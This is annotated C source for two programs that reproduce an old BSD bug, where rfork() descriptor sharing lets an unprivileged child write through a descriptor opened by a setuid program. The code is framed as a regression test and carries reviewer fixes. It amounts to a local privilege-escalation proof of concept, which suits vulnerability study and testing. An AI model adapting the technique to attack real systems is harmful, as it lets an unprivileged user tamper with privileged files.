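/* OpenBSD 2.1, FreeBSD 3.0 */

/*
 * First program: stand-in for a set-user-ID binary (the second program
 * executes it as ./dummy-suid). It opens one file in the root directory and
 * then blocks, so a tester can check whether that descriptor is reachable
 * from any other process.
 *
 * NOTE(review): the header names after each #include were lost on the page;
 * the ones below are the standard headers for the calls actually used.
 */
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(void)
{
    int fd;

    umask(2);

    /* open a file in the root directory */
    /*
     * Assign first, compare second: the page's `fd = open(...) < 0` parses
     * as `fd = (open(...) < 0)`, which stores 0 or 1 instead of the
     * descriptor. O_CREAT also requires an explicit mode argument; without
     * it the permission bits of the new file are indeterminate. 0600 is a
     * reviewer-chosen, least-permissive value (the page gave none).
     */
    fd = open("/VULNERABLE", O_RDWR | O_CREAT, 0600);
    if (fd < 0) {
        perror("open");
        exit(EXIT_FAILURE);     /* report the failure in the exit status */
    }

    /* wait for something to happen */
    /* Block in pause() instead of spinning; the process still never exits. */
    for (;;) {
        pause();
    }
}

-- cut here (test.c) --

/*
 * Second program: regression check for descriptor-table sharing across exec
 * of a set-user-ID image. It rfork()s a child that shares this process's
 * descriptor table, then replaces itself with ./dummy-suid. If the child's
 * write succeeds, the privileged process's descriptor was reachable from
 * unprivileged code; a privileged image is expected to get a private
 * descriptor table at exec time.
 *
 * NOTE(review): rfork() and RFPROC are BSD-specific; <unistd.h> is where
 * FreeBSD declares them - confirm for the target system.
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(void)
{
    static const char msg[] = "VULNERABLE\n";
    int p;

    /* UNPRIVILEGED */
    /* create a new process that shares its parent's file
     * descriptor table */
    p = rfork(RFPROC);
    if (p < 0) {
        /* The page treated -1 like the parent path and went on to exec. */
        perror("rfork");
        exit(EXIT_FAILURE);
    }
    if (p == 0) {
        /* wait for parent to open a file, write
         * to it. */
        sleep(1);
        /*
         * Descriptor 3 is hard-coded: it assumes only 0, 1 and 2 were open
         * when the other program called open(). The length is taken from
         * the buffer so the trailing newline is written too (the page passed
         * 10 for an 11-byte string). A failure here (e.g. EBADF) is the
         * expected result when the table is not shared.
         */
        if (write(3, msg, sizeof msg - 1) < 0) {
            perror("write");
            exit(EXIT_FAILURE);
        }
        exit(0);
    }

    /* PRIVILEGED */
    /* execute 'p', an SUID program that opens a file and
     * hangs */
    execl("./dummy-suid", "dummy-suid", (char *)NULL);

    /* execl() only returns on error. */
    perror("execl");
    exit(EXIT_FAILURE);
}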